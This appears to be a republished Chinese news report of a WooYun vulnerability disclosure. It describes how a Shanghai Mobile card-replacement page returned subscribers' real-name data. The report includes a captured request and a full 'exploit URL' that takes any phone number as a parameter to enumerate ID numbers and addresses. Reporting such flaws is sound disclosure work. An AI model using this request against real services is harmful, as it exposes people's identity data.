就下载 —— 安全下载、无毒手机软件、绿色软件官方下载网站最近更新|下载排行|热门标签|收藏本站

您现在的位置是:就下载 > IT资讯 > IT新观察 > 中国移动曝漏洞:用户实名信息任意查

乌云漏洞平台披露,通过漏洞,上海移动所有用户实名制信息可任意查询(包括身份证号,居住地址等)。目前,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门通报。

以下是漏洞泄露信息过程:

上海移动,换卡不换号

http://www.sh.10086.cn/shop/app?service=page/base.OrderBackUpCard&listener=initPage

需要验证实名制身份证信息,抓包,发现如下POST请求:

http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post

用户登记的信息竟然直接返回。

利用URL:http://www.sh.10086.cn/shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post&edit_MANAGENUMBER=手机号

可遍历全市用户实名制信息。

例1:

例2:

点到为止,不再遍历。

漏洞证明:例1:

例2:

上一篇:太穷:欧洲运营商们抱团合并

本文地址:IT新观察 >> http://www.9xz.net/it/xinguancha/55259.html

下一篇:松下开发WiFi新技术:人多网速照样杠杠的

  • 打印
推荐阅读
热门专题
推荐内容
热点内容